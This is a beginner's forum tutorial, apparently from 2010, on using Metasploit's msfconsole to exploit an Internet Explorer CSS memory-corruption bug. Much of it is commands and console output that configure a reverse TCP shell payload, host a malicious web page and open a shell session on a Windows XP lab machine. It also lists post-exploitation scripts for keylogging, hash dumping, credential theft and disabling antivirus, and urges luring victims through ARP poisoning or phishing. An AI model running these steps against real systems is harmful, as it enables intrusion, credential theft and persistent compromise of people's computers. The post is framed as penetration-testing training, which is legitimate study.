For those beginners, much of this stuff can be found in some good resources I will cite later. Please leave comments on things you'd like to see inlcuded or corrections that may need to be made. Currently this post is a work in progress
This demonstration uses the new "windows/browser/ms10_xxx_ie_css_clip"
More info available from Exploit-db New IE6,7,8 mem corruption
Common msfconsole tasks;
first of course open a terminal and issue the command
Code:
root@bt:~#msfconsole
Then there are some basics like searching for exploits. A more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that are 2010 microsoft security advisories.
Next, maybe we want to know more about a given exploit; This information looks similar to what is found on the advisories and maybe even on Exploits Database by Offensive Security, but includes things like the options that can be set.
Code:
info windows/browser/ms10_xxx_ie_css_clip
now we will load up an exploit we'd like to try.
Code:
use windows/browser/ms10_xxx_ie_css_clip
We need to configure our exploit options for it to work of course. I like to select payloads first. Not all payloads work with all exploits. Too keep things simple the metasploit developers have designed the framework so that once you have selected the exploit you would like to use, if you issue the command below(show payloads) the framwork will only show the payloads that work for your selected exploit.
Code:
msf exploit(ms10_xxx_ie_css_clip) > show payloads
Remember the info command we used with exploits? Well it works with payloads too. Take some time to familiarize yourself with the payloads metasploit has to offer.
Code:
msf exploit(ms10_xxx_ie_css_clip) > info windows/shell/reverse_tcp
Lets go ahead and select a payload to use.
Code:
msf exploit(ms10_xxx_ie_css_clip) > set payload windows/shell/reverse_tcp
Now we need to configure our options. Lets take a look at what options we have.
Code:
msf exploit(ms10_xxx_ie_css_clip) > show options
ok, lets set things up!
Code:
msf exploit(ms10_xxx_ie_css_clip) > set lhost 192.168.1.105
msf exploit(ms10_xxx_ie_css_clip) > set lport 31337
msf exploit(ms10_xxx_ie_css_clip) > set uripath /
msf exploit(ms10_xxx_ie_css_clip) > set srvport 80
The uripath options sets the directory the malicious webserver will be located. Root directory keeps it simple. srvport sets the webserver port to 80, also making this vector simpler to perform. Please refer to other documentation for the other options such as the excellent
Metasploit Unleashed Information Security Training
Here is where you might want to include some automation or set some of the other features. To view advanced options available, issue the following command;
A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
Please refer to the section 10 (meterpreter scripting) of the MSF unleashed course for more information on which scripts are available.
Another way is to issue the follow command in your terminal(not in the framework console)
Code:
root@bt:~# ls /pentest/exploits/framework3/scripts/meterpreter/
arp_scanner.rb enum_putty.rb getcountermeasure.rb multi_meter_inject.rb remotewinenum.rb webcam.rb
autoroute.rb enum_shares.rb getgui.rb multicommand.rb scheduleme.rb win32-sshclient.rb
checkvm.rb enum_vmware.rb gettelnet.rb multiscript.rb schtasksabuse.rb win32-sshserver.rb
credcollect.rb event_manager.rb getvncpw.rb netenum.rb scraper.rb winbf.rb
domain_list_gen.rb file_collector.rb hashdump.rb packetrecorder.rb screen_unlock.rb winenum.rb
dumplinks.rb get_application_list.rb hostsedit.rb panda_2007_pavsrv51.rb search_dwld.rb wmic.rb
duplicate.rb get_env.rb keylogrecorder.rb persistence.rb service_permissions_escalate.rb
enum_chrome.rb get_filezilla_creds.rb killav.rb pml_driver_config.rb srt_webdrive_priv.rb
enum_firefox.rb get_local_subnets.rb metsvc.rb powerdump.rb uploadexec.rb
enum_logged_on_users.rb get_loggedon_users.rb migrate.rb prefetchtool.rb virtualbox_sysenter_dos.rb
enum_powershell_env.rb get_pidgin_creds.rb multi_console_command.rb process_memdump.rb vnc.rb
The two autorunscript options allow your session to perform scripted tasks as soon as the session begins. Things like making a meterpreter session persistent, or beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting with what automation you find works for you.
Now we need to run our exploit. I like the -j option as it backgrounds the exploit process so you can continue to work in the framework console.
Now find a creative way to lure your victim to your malicious website in this case since the exploit we've selected here is a client side. You could use ARP poisoning or a phishing style attack with the link. Be inventive! I am just using a simple not updated windows XP SP3 machine running on my LAN in Virtualbox, so I will just browse there myself. In my victim's web-browser I simply entered my attackers IP
Code:
http://192.168.1.105/
Well we got a session!. Here is some output from my msfconsole
Code:
msf exploit(ms10_xxx_ie_css_clip) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.105:31337
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.105:80/
[*] Server started.
msf exploit(ms10_xxx_ie_css_clip) >[*] Sending Internet Explorer CSS SetUserClip Memory Corruption to 192.168.1.147:1053 (target: Internet Explorer 6)...
[*] Sending stage (240 bytes) to 192.168.1.147
[*] Command shell session 1 opened (192.168.1.105:31337 -> 192.168.1.147:1055) at 2010-11-14 11:34:44 -0600
[*] Session ID 1 (192.168.1.105:31337 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
[-] Error: Command shell sessions do not support migration
In this case we are using a simple reverse shell and not a meterpreter. The migration error is ok, as migrate is a meterpreter script. Some instances maybe you could only begin with a shell due to payload limitations an exploit has. No problem. Here is what I like to do
Turning windows shells into meterpreter sessions the easy way.
First, lets list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.
Code:
msf exploit(ms10_xxx_ie_css_clip) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.105:31337 -> 192.168.1.147:1055
msf exploit(ms10_xxx_ie_css_clip) > sessions -h
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-d <opt> Detach an interactive session
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate session
-l List all active sessions
-q Quiet mode
-s <opt> Run a script on the session given with -i, or all
-u <opt> Upgrade a win32 shell to a meterpreter session
-v List verbose fields
that -u options is pretty sweet. Lets go ahead and upgrade our shell to a meterpreter. FYI, It did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway the update a shell command is;
Code:
msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1
EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload, then upgraded that. I've also shown the makerc command, and the migrate meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
Makerc is useful as it will generate a metasploit resource file(akin to a bash script for metasploit almost) of all the commands used in that session. Good automation tool. I will show using resource files later on, and they are also covered in the MSF unleashed course
m10_061_spoolss demo
...continued....
My Metasploit tutorial thread
